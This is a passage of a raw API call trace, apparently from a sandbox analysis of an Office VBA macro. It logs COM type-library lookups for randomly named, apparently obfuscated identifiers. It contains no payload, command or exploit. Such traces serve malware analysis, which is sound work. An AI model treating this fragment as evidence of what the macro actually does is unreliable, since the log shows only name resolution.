ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a8a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="dBAAZAx") returned 8 [0069.187] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="dBAAZAx", lHashVal=0x10e742, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a8a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="dBAAZAx") returned 8 [0069.187] ITypeComp:RemoteBind (in: This=0x665bd30, szName="dBAAZAx", lHashVal=0x10e742, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dBAAZAx") returned 0x10e742 [0069.187] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="dBAAZAx" | out: _Dst="dBAAZAx") returned 0x0 [0069.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="dBAAZAx") returned 8 [0069.187] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.187] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="dBAAZAx", lHashVal=0x10e742, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.187] IUnknown:Release (This=0x665ba50) returned 0xd [0069.187] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.187] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="dBAAZAx", lHashVal=0x10e742, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.187] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.187] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.187] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="dBAAZAx", lHashVal=0x10e742, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.187] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.187] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.187] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="dBAAZAx", lHashVal=0x10e742, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.187] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a8a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="dBAAZAx") returned 8 [0069.187] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="dBAAZAx", lHashVal=0x10e742, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.187] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.187] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62a8a | out: _Dst=0x67c2d40) returned 0x0 [0069.187] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_dBAAZAx") returned 0x10eac6 [0069.187] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_dBAAZAx" | out: _Dst="_B_var_dBAAZAx") returned 0x0 [0069.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_dBAAZAx") returned 15 [0069.188] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.188] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_dBAAZAx", lHashVal=0x10eac6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.188] IUnknown:Release (This=0x665ba50) returned 0xd [0069.188] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.188] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_dBAAZAx", lHashVal=0x10eac6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.188] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.188] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.188] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_dBAAZAx", lHashVal=0x10eac6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.188] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.188] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.188] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_dBAAZAx", lHashVal=0x10eac6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.188] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.188] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.188] IUnknown:Release (This=0x665ba50) returned 0xd [0069.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1187e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_dBAAZAx") returned 15 [0069.188] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_dBAAZAx", lHashVal=0x10eac6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0) returned 0x0 [0069.188] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62a8a | out: _Dst=0x144ec0) returned 0x0 [0069.188] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aUD4AZxC", lHashVal=0x10c516, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ab2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aUD4AZxC") returned 9 [0069.188] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aUD4AZxC", lHashVal=0x10c516, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ab2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aUD4AZxC") returned 9 [0069.189] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aUD4AZxC", lHashVal=0x10c516, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aUD4AZxC") returned 0x10c516 [0069.189] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="aUD4AZxC" | out: _Dst="aUD4AZxC") returned 0x0 [0069.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="aUD4AZxC") returned 9 [0069.189] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.189] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aUD4AZxC", lHashVal=0x10c516, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.189] IUnknown:Release (This=0x665ba50) returned 0xd [0069.189] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.189] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aUD4AZxC", lHashVal=0x10c516, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.189] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.189] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.189] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aUD4AZxC", lHashVal=0x10c516, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.189] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.189] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.189] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aUD4AZxC", lHashVal=0x10c516, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.189] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ab2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aUD4AZxC") returned 9 [0069.189] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aUD4AZxC", lHashVal=0x10c516, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.189] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.189] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62ab2 | out: _Dst=0x67c2d40) returned 0x0 [0069.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aUD4AZxC") returned 0x109c9f [0069.189] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_aUD4AZxC" | out: _Dst="_B_var_aUD4AZxC") returned 0x0 [0069.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_aUD4AZxC") returned 16 [0069.190] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.190] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aUD4AZxC", lHashVal=0x109c9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.190] IUnknown:Release (This=0x665ba50) returned 0xd [0069.190] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.190] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aUD4AZxC", lHashVal=0x109c9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.190] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.190] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.190] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aUD4AZxC", lHashVal=0x109c9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.190] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.190] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.190] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aUD4AZxC", lHashVal=0x109c9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.190] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.190] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.190] IUnknown:Release (This=0x665ba50) returned 0xd [0069.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b118ae, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_aUD4AZxC") returned 16 [0069.190] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aUD4AZxC", lHashVal=0x109c9f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0069.190] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62ab2 | out: _Dst=0x144ec0) returned 0x0 [0069.190] ITypeComp:RemoteBind (in: This=0x665ba60, szName="m_AAxC", lHashVal=0x108366, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ade, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="m_AAxC") returned 7 [0069.190] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="m_AAxC", lHashVal=0x108366, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ade, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="m_AAxC") returned 7 [0069.190] ITypeComp:RemoteBind (in: This=0x665bd30, szName="m_AAxC", lHashVal=0x108366, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m_AAxC") returned 0x108366 [0069.190] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="m_AAxC" | out: _Dst="m_AAxC") returned 0x0 [0069.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="m_AAxC") returned 7 [0069.191] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.191] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="m_AAxC", lHashVal=0x108366, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.191] IUnknown:Release (This=0x665ba50) returned 0xd [0069.191] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.191] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="m_AAxC", lHashVal=0x108366, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.191] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.191] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.191] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="m_AAxC", lHashVal=0x108366, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.191] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.191] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.191] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="m_AAxC", lHashVal=0x108366, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.191] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ade, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="m_AAxC") returned 7 [0069.191] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="m_AAxC", lHashVal=0x108366, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.191] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.191] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62ade | out: _Dst=0x67c2d40) returned 0x0 [0069.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_m_AAxC") returned 0x10fe0f [0069.191] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_m_AAxC" | out: _Dst="_B_var_m_AAxC") returned 0x0 [0069.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_m_AAxC") returned 14 [0069.191] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.191] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_m_AAxC", lHashVal=0x10fe0f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.191] IUnknown:Release (This=0x665ba50) returned 0xd [0069.191] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.191] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_m_AAxC", lHashVal=0x10fe0f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.191] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.191] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.191] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_m_AAxC", lHashVal=0x10fe0f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.191] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.192] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.192] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_m_AAxC", lHashVal=0x10fe0f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.192] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.192] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.192] IUnknown:Release (This=0x665ba50) returned 0xd [0069.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b118de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_m_AAxC") returned 14 [0069.192] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_m_AAxC", lHashVal=0x10fe0f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0069.192] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62ade | out: _Dst=0x144ec0) returned 0x0 [0069.192] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.192] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.192] IUnknown:Release (This=0x665ba50) returned 0xd [0069.192] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.192] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.192] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.192] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.192] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.192] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.192] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.192] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.192] IUnknown:Release (This=0x665ba50) returned 0xd [0069.192] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.192] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.193] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.193] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.193] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.193] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.193] IUnknown:Release (This=0x665ba50) returned 0xd [0069.193] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.193] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.193] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.193] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.193] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.193] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.193] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.193] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.193] IUnknown:Release (This=0x665ba50) returned 0xd [0069.193] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.193] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.193] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, 